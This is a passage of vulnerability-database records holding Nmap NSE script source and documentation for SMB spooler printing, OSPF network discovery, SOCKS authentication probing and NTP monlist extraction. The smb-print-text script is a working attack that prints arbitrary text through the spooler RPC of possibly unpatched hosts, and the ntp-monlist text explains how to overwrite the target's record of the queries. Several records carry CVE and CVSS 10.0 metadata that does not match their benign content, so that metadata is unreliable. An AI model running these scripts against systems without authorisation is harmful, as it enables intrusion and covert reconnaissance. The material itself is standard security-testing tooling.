\"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nAttempts to print text on a shared printer by calling Print Spooler Service RPC functions.\n\nIn order to use the script, at least one printer needs to be shared\nover SMB. 
If no printer is specified, script tries to enumerate existing\nones by calling LANMAN API which might not be always available.\nLANMAN is available by default on Windows XP, but not on Vista or Windows 7\nfor example. In that case, you need to specify printer share name manually\nusing <code>printer</code> script argument. You can find out available shares\nby using smb-enum-shares script.\n\nLater versions of Windows require valid credentials by default\nwhich you can specify trough smb library arguments <code>smbuser</code> and\n<code>smbpassword</code> or other options.\n\n]]\n---\n-- @usage nmap -p 445 <target> --script=smb-print-text --script-args=\"text=0wn3d\"\n--\n-- @output\n-- |_smb-print-text: Printer job started using MyPrinter printer share.\n--\n-- @args printer Printer share name. Optional, by default script tries to enumerate available printer shares.\n-- @args text Text to print. Either text or filename need to be specified.\n-- @args filename File to read text from (ASCII only).\n--\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host,port)\n local status, smbstate\n local text = stdnse.get_script_args(SCRIPT_NAME .. '.text')\n local filename = stdnse.get_script_args(SCRIPT_NAME .. '.filename')\n if (not text) and (not filename) then\n stdnse.debug1(\"Script requires either text or filename script argument.\")\n return false\n end\n local text_to_print\n if text then\n text_to_print = text\n else\n -- read text from file\n local file = io.open(filename, \"rb\")\n text_to_print = file:read(\"a\")\n file:close()\n end\n status, smbstate = msrpc.start_smb(host, msrpc.SPOOLSS_PATH,true)\n if(status == false) then\n stdnse.debug1(\"SMB: \" .. 
smbstate)\n return false, smbstate\n end\n\n local bind_result\n status, bind_result = msrpc.bind(smbstate,msrpc.SPOOLSS_UUID, msrpc.SPOOLSS_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n stdnse.debug1(\"SMB: \" .. bind_result)\n return false, bind_result\n end\n local printer = stdnse.get_script_args(SCRIPT_NAME .. '.printer')\n -- if printer not set find available printers\n if not printer then\n stdnse.debug1(\"No printer specified, trying to find one...\")\n local lanman_result\n local REMSmb_NetShareEnum_P = \"WrLeh\"\n local REMSmb_share_info_1 = \"B13BWz\"\n status, lanman_result = msrpc.call_lanmanapi(smbstate,0,REMSmb_NetShareEnum_P,REMSmb_share_info_1,string.pack(\"<I2I2\", 0x01, 65406))\n if status == false then\n stdnse.debug1(\"SMB: \" .. lanman_result)\n stdnse.debug1(\"SMB: Looks like LANMAN API is not available. Try setting printer script arg.\")\n return false\n end\n\n local parameters = lanman_result.parameters\n local data = lanman_result.data\n local status, convert, entry_count, available_entries = string.unpack(\"<I2 I2 I2 I2\", parameters)\n local pos = 1\n for i = 1, entry_count, 1 do\n local name, share_type = string.unpack(\">c14 I2\", data, pos)\n\n if share_type == 1 then -- share is printer\n name = string.unpack(\"z\", name)\n stdnse.debug1(\"Found printer share %s.\", name)\n printer = name\n break\n end\n pos = pos + 20\n end\n end\n if not printer then\n stdnse.debug1(\"No printer found, system may be unpatched but it needs at least one printer shared to be vulnerable.\")\n return false\n end\n stdnse.debug1(\"Using %s as printer.\",printer)\n -- call RpcOpenPrinterEx - opnum 69\n local status, result = msrpc.spoolss_open_printer(smbstate,\"\\\\\\\\\"..host.ip..\"\\\\\"..printer)\n if not status then\n return false\n end\n local printer_handle = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Printer handle %s\",stdnse.tohex(printer_handle))\n -- call RpcStartDocPrinter - opnum 17\n status,result 
= msrpc.spoolss_start_doc_printer(smbstate,printer_handle,\"nmap_print_test.txt\") -- patched version will allow this\n if not status then\n return false\n end\n local print_job_id = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Start doc printer job id %s\",stdnse.tohex(print_job_id))\n\n -- call RpcWritePrinter - 19\n status, result = msrpc.spoolss_write_printer(smbstate,printer_handle,text_to_print)\n if not status then\n return false\n end\n local write_result = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Written %s bytes to a file.\",stdnse.tohex(write_result))\n\n status,result = msrpc.spoolss_end_doc_printer(smbstate,printer_handle)\n\n return string.format(\"Printer job started using <%s> printer share.\", printer)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:55", "description": "Discover IPv4 networks using the Open Shortest Path First version 2 (OSPFv2) protocol. \n\nThe script works by listening for OSPF Hello packets from the 224.0.0.5 multicast address. The script then replies and attempts to create a neighbor relationship, in order to discover the network database. \n\nIf no interface was provided as a script argument or through the -e option, the script will fail unless a single interface is present on the system.\n\n## Script Arguments \n\n#### broadcast-ospf2-discover.md5_key \n\nMD5 digest key to use if message digest authentication is disclosed.\n\n#### broadcast-ospf2-discover.router_id \n\nRouter ID to use. Defaults to 0.0.0.1\n\n#### broadcast-ospf2-discover.timeout \n\nTime in seconds that the script waits for hellos from other routers. Defaults to 10 seconds, matching the OSPFv2 default value for the hello interval.\n\n#### broadcast-ospf2-discover.interface \n\nInterface to send on (overrides -e). 
Mandatory if not using -e and multiple interfaces are present.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=broadcast-ospf2-discover\n nmap --script=broadcast-ospf2-discover -e wlan0\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-ospf2-discover:\n | Area ID: 0.0.0.0\n | External Routes\n | 192.168.24.0/24\n |_ Use the newtargets script-arg to add the results as targets\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [ospf](<../lib/ospf.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [target](<../lib/target.html>)\n * [os](<>)\n * [string](<>)\n * [table](<>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-14T00:15:22", "type": "nmap", "title": "broadcast-ospf2-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-09T17:06:03", "id": "NMAP:BROADCAST-OSPF2-DISCOVER.NSE", "href": 
"https://nmap.org/nsedoc/scripts/broadcast-ospf2-discover.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal ospf = require \"ospf\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal target = require \"target\"\nlocal os = require \"os\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\nlocal have_ssl, openssl = pcall(require,'openssl')\n\ndescription = [[\nDiscover IPv4 networks using Open Shortest Path First version 2(OSPFv2) protocol.\n\nThe script works by listening for OSPF Hello packets from the 224.0.0.5\nmulticast address. The script then replies and attempts to create a neighbor\nrelationship, in order to discover network database.\n\nIf no interface was provided as a script argument or through the -e option,\nthe script will fail unless a single interface is present on the system.\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-ospf2-discover\n-- nmap --script=broadcast-ospf2-discover -e wlan0\n--\n-- @args broadcast-ospf2-discover.md5_key MD5 digest key to use if message digest\n-- authentication is disclosed.\n--\n-- @args broadcast-ospf2-discover.router_id Router ID to use. Defaults to 0.0.0.1\n--\n-- @args broadcast-ospf2-discover.timeout Time in seconds that the script waits for\n-- hello from other routers. Defaults to 10 seconds, matching OSPFv2 default\n-- value for hello interval.\n--\n-- @args broadcast-ospf2-discover.interface Interface to send on (overrides -e). 
Mandatory\n-- if not using -e and multiple interfaces are present.\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-ospf2-discover:\n-- | Area ID: 0.0.0.0\n-- | External Routes\n-- | 192.168.24.0/24\n-- |_ Use the newtargets script-arg to add the results as targets\n--\n\nauthor = \"Emiliano Ticci\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"discovery\", \"safe\"}\n\nprerule = function()\n if nmap.address_family() ~= \"inet\" then\n stdnse.print_verbose(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.print_verbose(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Script constants\nOSPF_ALL_ROUTERS = \"224.0.0.5\"\nOSPF_MSG_HELLO = 0x01\nOSPF_MSG_DBDESC = 0x02\nOSPF_MSG_LSREQ = 0x03\nOSPF_MSG_LSUPD = 0x04\nlocal md5_key, router_id\n\n-- Convenience functions\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Print OSPFv2 LSA Header packet details to debug output.\n-- @param hello OSPFv2 LSA Header packet\nlocal ospfDumpLSAHeader = function(lsa_h)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| LS Age: %s\", lsa_h.age)\n stdnse.print_debug(2, \"| Options: %s\", lsa_h.options)\n stdnse.print_debug(2, \"| LS Type: %s\", lsa_h.type)\n stdnse.print_debug(2, \"| Link State ID: %s\", lsa_h.id)\n stdnse.print_debug(2, \"| Advertising Router: %s\", lsa_h.adv_router)\n stdnse.print_debug(2, \"| Sequence: 0x%s\", lsa_h.sequence)\n stdnse.print_debug(2, \"| Checksum: 0x%s\", lsa_h.checksum)\n stdnse.print_debug(2, \"| Length: %s\", lsa_h.length)\nend\n\n-- Print OSPFv2 Database Description packet details to debug output.\n-- @param hello OSPFv2 Database Description packet\nlocal ospfDumpDBDesc = function(db_desc)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| MTU: %s\", db_desc.mtu)\n stdnse.print_debug(2, \"| Options: %s\", db_desc.options)\n 
stdnse.print_debug(2, \"| Init: %s\", db_desc.init)\n stdnse.print_debug(2, \"| More: %s\", db_desc.more)\n stdnse.print_debug(2, \"| Master: %s\", db_desc.master)\n stdnse.print_debug(2, \"| Sequence: %s\", db_desc.sequence)\n if #db_desc.lsa_headers > 0 then\n stdnse.print_debug(2, \"| LSA Headers:\")\n for i, lsa_h in ipairs(db_desc.lsa_headers) do\n ospfDumpLSAHeader(lsa_h)\n if i < #db_desc.lsa_headers then\n stdnse.print_debug(2, \"|\")\n end\n end\n end\nend\n\n-- Print OSPFv2 Hello packet details to debug output.\n-- @param hello OSPFv2 Hello packet\nlocal ospfDumpHello = function(hello)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| Router ID: %s\", hello.header.router_id)\n stdnse.print_debug(2, \"| Area ID: %s\", ipOps.fromdword(hello.header.area_id))\n stdnse.print_debug(2, \"| Checksum: %s\", hello.header.chksum)\n stdnse.print_debug(2, \"| Auth Type: %s\", hello.header.auth_type)\n if hello.header.auth_type == 0x01 then\n stdnse.print_debug(2, \"| Auth Password: %s\", hello.header.auth_data.password)\n elseif hello.header.auth_type == 0x02 then\n stdnse.print_debug(2, \"| Auth Crypt Key ID: %s\", hello.header.auth_data.keyid)\n stdnse.print_debug(2, \"| Auth Data Length: %s\", hello.header.auth_data.length)\n stdnse.print_debug(2, \"| Auth Crypt Seq: %s\", hello.header.auth_data.seq)\n end\n stdnse.print_debug(2, \"| Netmask: %s\", hello.netmask)\n stdnse.print_debug(2, \"| Hello interval: %s\", hello.interval)\n stdnse.print_debug(2, \"| Options: %s\", hello.options)\n stdnse.print_debug(2, \"| Priority: %s\", hello.prio)\n stdnse.print_debug(2, \"| Dead interval: %s\", hello.router_dead_interval)\n stdnse.print_debug(2, \"| Designated Router: %s\", hello.DR)\n stdnse.print_debug(2, \"| Backup Router: %s\", hello.BDR)\n stdnse.print_debug(2, \"| Neighbors: %s\", table.concat(hello.neighbors, \",\"))\nend\n\n-- Print OSPFv2 LS Request packet details to debug output.\n-- @param ls_req OSPFv2 LS Request packet\nlocal 
ospfDumpLSRequest = function(ls_req)\n if 2 > nmap.debugging() then\n return\n end\n for i, req in ipairs(ls_req.ls_requests) do\n stdnse.print_debug(2, \"| LS Type: %s\", req.type)\n stdnse.print_debug(2, \"| Link State ID: %s\", req.id)\n stdnse.print_debug(2, \"| Avertising Router: %s\", req.adv_router)\n if i < #ls_req.ls_requests then\n stdnse.print_debug(2, \"|\")\n end\n end\nend\n\n-- Print OSPFv2 LS Update packet details to debug output.\n-- @param ls_upd OSPFv2 LS Update packet\nlocal ospfDumpLSUpdate = function(ls_upd)\n stdnse.print_debug(2, \"| Number of LSAs: %s\", ls_upd.num_lsas)\n for i, lsa in ipairs(ls_upd.lsas) do\n -- Only Type 1 (Router-LSA) and Type 5 (AS-External-LSA) are supported at the moment\n ospfDumpLSAHeader(lsa.header)\n if lsa.header.type == 1 then\n stdnse.print_debug(2, \"| Flags: %s\", lsa.flags)\n stdnse.print_debug(2, \"| Number of links: %s\", lsa.num_links)\n for j, link in ipairs(lsa.links) do\n stdnse.print_debug(2, \"| Link ID: %s\", link.id)\n stdnse.print_debug(2, \"| Link Data: %s\", link.data)\n stdnse.print_debug(2, \"| Link Type: %s\", link.type)\n stdnse.print_debug(2, \"| Number of Metrics: %s\", link.num_metrics)\n stdnse.print_debug(2, \"| 0 Metric: %s\", link.metric)\n if j < #lsa.links then\n stdnse.print_debug(2, \"|\")\n end\n end\n if i < #ls_upd.lsas then\n stdnse.print_debug(2, \"|\")\n end\n elseif lsa.header.type == 5 then\n stdnse.print_debug(2, \"| Netmask: %s\", lsa.netmask)\n stdnse.print_debug(2, \"| External Type: %s\", lsa.ext_type)\n stdnse.print_debug(2, \"| Metric: %s\", lsa.metric)\n stdnse.print_debug(2, \"| Forwarding Address: %s\", lsa.fw_address)\n stdnse.print_debug(2, \"| External Route Tag: %s\", lsa.ext_tag)\n end\n end\nend\n\n-- Send OSPFv2 packet to specified destination.\n-- @param interface Source interface to use\n-- @param ip_dst Destination IP address\n-- @param mac_dst Destination MAC address\n-- @param ospf_packet Raw OSPF packet\nlocal ospfSend = function(interface, ip_dst, 
mac_dst, ospf_packet)\n local dnet = nmap.new_dnet()\n local probe = packet.Frame:new()\n\n probe.mac_src = interface.mac\n probe.mac_dst = mac_dst\n probe.ip_bin_src = ipOps.ip_to_str(interface.address)\n probe.ip_bin_dst = ipOps.ip_to_str(ip_dst)\n probe.l3_packet = ospf_packet\n probe.ip_dsf = 0xc0\n probe.ip_p = 89\n probe.ip_ttl = 1\n\n probe:build_ip_packet()\n probe:build_ether_frame()\n\n dnet:ethernet_open(interface.device)\n dnet:ethernet_send(probe.frame_buf)\n dnet:ethernet_close()\nend\n\n-- Prepare OSPFv2 packet header for reply.\n-- @param packet_in Source packet\n-- @param packet_out Destination packet\nlocal ospfSetHeader = function(packet_in, packet_out)\n packet_out.header:setRouterId(router_id)\n packet_out.header:setAreaID(packet_in.header.area_id)\n if packet_in.header.auth_type == 0x01 then\n packet_out.header.auth_type = 0x01\n packet_out.header.auth_data.password = packet_in.header.auth_data.password\n elseif packet_in.header.auth_type == 0x02 then\n packet_out.header.auth_type = 0x02\n packet_out.header.auth_data.key = md5_key\n packet_out.header.auth_data.keyid = packet_in.header.auth_data.keyid\n packet_out.header.auth_data.length = 16\n packet_out.header.auth_data.seq = os.time()\n end\n\n return packet_out\nend\n\n-- Reply to OSPFv2 Database Description with an LS Request.\n-- @param interface Source interface\n-- @param mac_dst Destination MAC address\n-- @param db_desc_in OSPFv2 Database Description packet to reply for\nlocal ospfSendLSRequest = function(interface, mac_dst, db_desc_in)\n local ls_req_out = ospf.OSPF.LSRequest:new()\n ls_req_out = ospfSetHeader(db_desc_in, ls_req_out)\n\n for i, lsa_h in ipairs(db_desc_in.lsa_headers) do\n ls_req_out:addRequest(lsa_h.type, lsa_h.id, lsa_h.adv_router)\n end\n\n stdnse.print_debug(2, \"Crafted OSPFv2 LS Request packet with the following parameters:\")\n ospfDumpLSRequest(ls_req_out)\n ospfSend(interface, db_desc_in.header.router_id, mac_dst, tostring(ls_req_out))\nend\n\n-- Reply to 
given OSPFv2 Database Description packet.\n-- @param interface Source interface\n-- @param mac_dst Destination MAC address\n-- @param db_desc_in OSPFv2 Database Description packet to reply for\nlocal ospfReplyDBDesc = function(interface, mac_dst, db_desc_in)\n local reply = false\n local db_desc_out = ospf.OSPF.DBDescription:new()\n db_desc_out = ospfSetHeader(db_desc_in, db_desc_out)\n\n if db_desc_in.init == true then\n db_desc_out.init = false\n db_desc_out.more = db_desc_in.more\n db_desc_out.master = false\n db_desc_out.sequence = db_desc_in.sequence\n reply = true\n elseif #db_desc_in.lsa_headers > 0 then\n ospfSendLSRequest(interface, mac_dst, db_desc_in)\n return true\n end\n\n if reply then\n stdnse.print_debug(2, \"Crafted OSPFv2 Database Description packet with the following parameters:\")\n ospfDumpDBDesc(db_desc_out)\n ospfSend(interface, db_desc_in.header.router_id, mac_dst, tostring(db_desc_out))\n end\n\n return reply\nend\n\n-- Reply to given OSPFv2 Hello packet sending another Hello to\n-- \"All OSPF Routers\" multicast address (224.0.0.5).\n-- @param interface Source interface\n-- @param hello_in OSPFv2 Hello packet to reply for\nlocal ospfReplyHello = function(interface, hello_in)\n local hello_out = ospf.OSPF.Hello:new()\n hello_out = ospfSetHeader(hello_in, hello_out)\n hello_out.interval = hello_in.interval\n hello_out.router_dead_interval = hello_in.router_dead_interval\n hello_out:setDesignatedRouter(hello_in.header.router_id)\n hello_out:setNetmask(hello_in.netmask)\n hello_out:addNeighbor(hello_in.header.router_id)\n\n stdnse.print_debug(2, \"Crafted OSPFv2 Hello packet with the following parameters:\")\n ospfDumpHello(hello_out)\n\n ospfSend(interface, OSPF_ALL_ROUTERS, \"\\x01\\x00\\x5e\\x00\\x00\\x05\", tostring(hello_out))\nend\n\n-- Listen for OSPF packets on a specified interface.\n-- @param interface Interface to use\n-- @param timeout Amount of time to listen in seconds\nlocal ospfListen = function(interface, timeout)\n local 
status, l2_data, l3_data, ospf_raw, _\n local start = nmap.clock_ms()\n\n stdnse.print_debug(\"Start listening on interface %s...\", interface.shortname)\n local listener = nmap.new_socket()\n listener:set_timeout(1000)\n listener:pcap_open(interface.device, 1500, true, \"ip proto 89 and not (ip src host \" .. interface.address .. \")\")\n while (nmap.clock_ms() - start) < (timeout * 1000) do\n status, _, l2_data, l3_data = listener:pcap_receive()\n if status then\n stdnse.print_debug(2, \"Packet received on interface %s.\", interface.shortname)\n local p = packet.Packet:new(l3_data, #l3_data)\n local ospf_raw = string.sub(l3_data, p.ip_hl * 4 + 1)\n if ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_HELLO then\n stdnse.print_debug(2, \"OSPFv2 Hello packet detected.\")\n\n local ospf_hello = ospf.OSPF.Hello.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 Hello packet with the following parameters:\")\n ospfDumpHello(ospf_hello)\n\n -- Additional checks required for message digest authentication\n if ospf_hello.header.auth_type == 0x02 then\n if not md5_key then\n return fail(\"Argument md5_key must be present when message digest authentication is disclosed.\")\n elseif not have_ssl then\n return fail(\"Cannot handle message digest authentication unless openssl is compiled in.\")\n end\n end\n\n ospfReplyHello(interface, ospf_hello)\n start = nmap.clock_ms()\n elseif ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_DBDESC then\n stdnse.print_debug(2, \"OSPFv2 Database Description packet detected.\")\n\n local ospf_db_desc = ospf.OSPF.DBDescription.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 Database Description packet with the following parameters:\")\n ospfDumpDBDesc(ospf_db_desc)\n\n if not ospfReplyDBDesc(interface, string.sub(l2_data, 7, 12), ospf_db_desc) then\n return\n end\n elseif ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_LSUPD then\n stdnse.print_debug(2, \"OSPFv2 LS Update packet detected.\")\n\n 
local ospf_ls_upd = ospf.OSPF.LSUpdate.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 LS Update packet with the following parameters:\")\n ospfDumpLSUpdate(ospf_ls_upd)\n\n local targets = {}\n for i, lsa in ipairs(ospf_ls_upd.lsas) do\n -- Only Type 1 (Router-LSA) and Type 5 (AS-External-LSA) are supported at the moment\n if lsa.header.type == 1 then\n for j, link in ipairs(lsa.links) do\n if link.type == 3 then\n local target = link.id .. ipOps.subnet_to_cidr(link.data)\n targets[target] = 1\n end\n end\n elseif lsa.header.type == 5 then\n local target = lsa.header.id .. ipOps.subnet_to_cidr(lsa.netmask)\n targets[target] = 1\n end\n end\n local output = stdnse.output_table()\n if next(targets) then\n local out_links = {}\n output[\"Area ID\"] = ipOps.fromdword(ospf_ls_upd.header.area_id)\n output[\"External Routes\"] = out_links\n for t, _ in pairs(targets) do\n table.insert(out_links, t)\n if target.ALLOW_NEW_TARGETS then\n target.add(t)\n end\n end\n if not target.ALLOW_NEW_TARGETS then\n stdnse.verbose(\"Use the newtargets script-arg to add the results as targets\")\n end\n end\n return output\n end\n end\n end\n listener:pcap_close()\nend\n\naction = function()\n -- Get script arguments\n md5_key = stdnse.get_script_args(SCRIPT_NAME .. \".md5_key\") or false\n router_id = stdnse.get_script_args(SCRIPT_NAME .. \".router_id\") or \"0.0.0.1\"\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\")) or 10\n local interface = stdnse.get_script_args(SCRIPT_NAME .. 
\".interface\")\n stdnse.print_debug(\"Value for router ID argument: %s.\", router_id)\n stdnse.print_debug(\"Value for timeout argument: %s.\", timeout)\n\n -- Determine interface to use\n interface = interface or nmap.get_interface()\n if interface then\n interface = nmap.get_interface_info(interface)\n if not interface then\n return fail((\"Failed to retrieve %s interface information.\"):format(interface))\n end\n stdnse.print_debug(\"Will use %s interface.\", interface.shortname)\n else\n local interface_list = nmap.list_interfaces()\n local interface_good = {}\n for _, os_interface in ipairs(interface_list) do\n if os_interface.address and os_interface.link == \"ethernet\" and\n os_interface.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n\n stdnse.print_debug(2, \"Found usable interface: %s.\", os_interface.shortname)\n table.insert(interface_good, os_interface)\n end\n end\n if #interface_good == 1 then\n interface = interface_good[1]\n stdnse.print_debug(\"Will use %s interface.\", interface.shortname)\n elseif #interface_good == 0 then\n return fail(\"Source interface not found.\")\n else\n return fail(\"Ambiguous source interface, please specify it with -e or interface parameter.\")\n end\n end\n\n return ospfListen(interface, timeout)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:21", "description": "Determines the supported authentication mechanisms of a remote SOCKS proxy server. Starting with SOCKS version 5 socks servers may support authentication. 
The script checks for the following authentication types: 0 - No authentication 1 - GSSAPI 2 - Username and password\n\n## Example Usage \n \n \n nmap -p 1080 <ip> --script socks-auth-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 1080/tcp open socks\n | socks-auth-info:\n | No authentication\n |_ Username and password\n \n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [socks](<../lib/socks.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:34:27", "type": "nmap", "title": "socks-auth-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:SOCKS-AUTH-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/socks-auth-info.html", "sourceData": "local shortport = require \"shortport\"\nlocal socks = require \"socks\"\nlocal table = require \"table\"\n\ndescription = [[\nDetermines the supported authentication mechanisms of a remote SOCKS\nproxy server. Starting with SOCKS version 5 socks servers may support\nauthentication. 
The script checks for the following authentication\ntypes:\n 0 - No authentication\n 1 - GSSAPI\n 2 - Username and password\n]]\n\n---\n-- @usage\n-- nmap -p 1080 <ip> --script socks-auth-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 1080/tcp open socks\n-- | socks-auth-info:\n-- | No authentication\n-- |_ Username and password\n--\n-- @xmloutput\n-- <table>\n-- <elem key=\"method\">0</elem>\n-- <elem key=\"name\">No authentication</elem>\n-- </table>\n-- <table>\n-- <elem key=\"method\">2</elem>\n-- <elem key=\"name\">Username and password</elem>\n-- </table>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"default\"}\n\nportrule = shortport.port_or_service({1080, 9050}, {\"socks\", \"socks5\", \"tor-socks\"})\n\naction = function(host, port)\n\n local helper = socks.Helper:new(host, port)\n local auth_methods = {}\n\n -- iterate over all authentication methods as the server only responds with\n -- a single supported one if we send a list.\n local mt = { __tostring = function(t) return t.name end }\n for _, method in pairs(socks.AuthMethod) do\n local status, response = helper:connect( method )\n if ( status ) then\n local out = {\n method = response.method,\n name = helper:authNameByNumber(response.method)\n }\n setmetatable(out, mt)\n table.insert(auth_methods, out)\n end\n end\n\n helper:close()\n if ( 0 == #auth_methods ) then return end\n return auth_methods\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:36", "description": "Obtains and prints an NTP server's monitor data. \n\nMonitor data is a list of the most recently used (MRU) having NTP associations with the target. Each record contains information about the most recent NTP packet sent by a host to the target including the source and destination addresses and the NTP version and mode of the packet. 
With this information it is possible to classify associated hosts as Servers, Peers, and Clients. \n\nA Peers command is also sent to the target and the peers list in the response allows differentiation between configured Mode 1 Peers and clients which act like Peers (such as the Windows W32Time service). \n\nAssociated hosts are further classified as either public or private. Private hosts are those having IP addresses which are not routable on the public Internet and thus can help to form a picture about the topology of the private network on which the target resides. \n\nOther information revealed by the monlist and peers commands includes the host with which the target clock is synchronized and hosts which send Control Mode (6) and Private Mode (7) commands to the target and which may be used by admins for the NTP service. \n\nIt should be noted that the very nature of the NTP monitor data means that the Mode 7 commands sent by this script are recorded by the target (and will often appear in these results). Since the monitor data is an MRU list, it is probable that you can overwrite the record of the Mode 7 command by sending an innocuous-looking Client Mode request. This can be achieved easily using Nmap: `nmap -sU -pU:123 -Pn -n --max-retries=0 <target>`\n\nNotes: \n\n * The monitor list in response to the monlist command is limited to 600 associations. \n * The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available). \n * There may be a restriction on who can perform Mode 7 commands (e.g. \"restrict noquery\" in `ntp.conf`) in which case you may not receive a reply. 
\n * This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).\n\n## Example Usage \n \n \n nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 123/udp open ntp udp-response\n | ntp-monlist:\n | Target is synchronised with 127.127.38.0 (reference clock)\n | Alternative Target Interfaces:\n | 10.17.4.20\n | Private Servers (0)\n | Public Servers (0)\n | Private Peers (0)\n | Public Peers (0)\n | Private Clients (2)\n | 10.20.8.69 169.254.138.63\n | Public Clients (597)\n | 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152\n | ...\n | 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118\n | 68.56.205.98\n | 2001:1400:0:0:0:0:0:1 2001:16d8:dd00:38:0:0:0:2\n | 2002:db5a:bccd:1:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682\n | Other Associations (1)\n |_ 127.0.0.1 seen 1949869 times. last tx was unicast v2 mode 7\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 